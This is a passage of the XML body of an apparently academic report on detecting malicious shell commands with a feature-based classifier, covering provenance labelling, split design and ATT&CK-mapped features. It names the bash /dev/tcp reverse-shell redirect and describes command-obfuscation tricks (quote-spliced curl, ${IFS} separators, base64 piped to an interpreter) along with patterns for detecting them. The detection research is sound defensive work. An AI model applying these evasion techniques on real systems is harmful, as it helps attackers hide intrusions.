    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>representation is uniform across collection methods — which is what allows the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>two corpora in this project to be harmonised at all (Chapter 5).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">It is also where the signal actually lives. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/dev/tcp/&lt;host&gt;/&lt;port&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is a bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>built-in redirect with essentially no legitimate interactive use, and it behaves</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">accordingly in our data: an odds ratio of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>559.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on Dataset 1. That kind of</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>near-categorical evidence exists only at the string level. The binary name alone</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>carries none of it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>The provenance-labeling premise, and what it costs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>No corpus of shell commands carries per-command intent labels, because intent is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>not observable in the artefact — it is a property of the operator. This project,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>like the published work it builds on, therefore inherits each label from **where</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the command was collected**: offensive references and honeypot capture are</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>labelled malicious, documentation and user-history corpora benign.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>This premise must be stated plainly because it bounds every result that follows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>A classifier can satisfy a provenance-labelled objective by learning corpus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rather than adversarial intent, and we measure three distinct forms of</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>that failure rather than assume them away:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Unlearnable overlap.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Commands that are byte-identical across classes —</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>uname -a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — carry no content signal whatever. They can only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>be "detected" by memorising the company they keep.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Source fingerprints.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A feature that saturates one source becomes a proxy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">for that source. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_ipv4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> fires on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>100%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>quasarnix</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rows in Dataset 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">and is flagged </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>P8-source-fingerprint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for exactly this reason.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="20" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Non-transfer.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Style-derived signal does not survive a change of corpus,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>so a model can score well in-distribution and still have learned nothing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>about the technique.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The mitigation is design rather than optimism, and it has to be described</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>precisely, because the split protects against one failure and not the other. The</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">in-distribution split is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>grouped by command shape</w:t>
      </w:r>
      <w:r>
        <w:t>: commands are reduced to a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>structural skeleton with literals, blobs and scratch-path filenames blanked, and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>a whole shape group is assigned to one side. Verified on the current build, zero</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>shape groups straddle either split, under either label. That is stronger than</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>deduplication — not only does no command string appear on both sides (measured</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>overlap: zero), no structural near-duplicate does either, so per-source recall</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>cannot be recall on a variant already seen in training.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">What the split is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> grouped by is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>source</w:t>
      </w:r>
      <w:r>
        <w:t>. All eleven Dataset 1 sources</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>and all three Dataset 2 sources appear on both sides of their own split, by</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>design: a same-source test set cannot detect a model that has learned corpus</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>style rather than adversarial intent, because style is present on both sides of</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>it. What can is the second corpus. Dataset 1 and Dataset 2 share no source at all, so the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>cross-dataset transfer evaluation in Chapter 8.2 is the honest generalisation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>test, and in-distribution accuracy is treated as an upper bound rather than a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>result. Around that sit a selection gate applied identically to both corpora and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">a do-nothing floor of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.40</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (the F1 of predicting "attack" for everything at</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>25% prevalence) that any candidate feature must beat.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>That discipline is measurable. The literal-IPv4 shortcut — the most obvious</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">available cheat — scores a solo-rule F1 of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.141</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Dataset 1) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>0.105</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(Dataset 2), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>below</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the do-nothing floor, at ROC-AUC 0.535 / 0.523. And the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>sharpest evidence that provenance labels are being handled honestly is that the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">project's own namesake points the wrong way: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>has_lotl_bin</w:t>
      </w:r>
      <w:r>
        <w:t>, the presence of a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">GTFOBins-style trusted binary, is a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>negative</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> predictor on both corpora</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>(OR 0.62 and 0.50). A pipeline quietly memorising "attack style" would not</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>surface a result that inconvenient. Section 1.2 maps four adversarial behaviours</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>onto the features that carry them, and Section 1.3 gives the semantic rationale</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>for the full 43-feature set.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 1.2 — Telemetry &amp; Feature Mapping (Noam's 4 rows)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Work split (WORK_DIVISION.md): Noam contributes rows N1–N4; Ben contributes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>B1–B3 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ch1_telemetry_rows_ben.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>). Each row uses the assignment's mandated</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">five-field structure. Every feature named below exists in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>FEATURE_NAMES</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>src/features.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>); every effect size is quoted live from</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>report/ch3_feature_decisions.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> (train splits only). Every ATT&amp;CK ID was</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>confirmed against the live technique page, including its platform list.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Row N1 — Command obfuscation (encoded and spliced payloads)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Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Content</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Adversarial behavioural characteristic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Attacker preserves command functionality while destroying its lexical signature — base64- or hex-encoding the payload and piping it to a decoder, splicing keywords with quotes (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>c"u"rl</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">), or rebuilding argument separators through </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>$IFS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> — specifically to defeat string- and signature-matching detection (T1027.010 Command Obfuscation, sub-technique of T1027; platforms Linux, Windows, macOS).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Required telemetry source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Shell command log: Linux </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>auditd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>type=EXECVE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> argv, Sysmon-for-Linux Event ID 1, or Cowrie </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>cowrie.command.input</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> for honeypot capture.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Specific log attributes / raw fields</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">The raw </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>command</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> string. Concretely: long unbroken </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>[A-Za-z0-9+/=]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> runs; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>\x41</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">-style escapes; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>base64 -d</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>openssl enc</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>xxd -r</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> adjacent to a `\</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> and an interpreter; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>${IFS}` in argument position; quote characters interrupting a binary name.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3024"/>
          </w:tcPr>
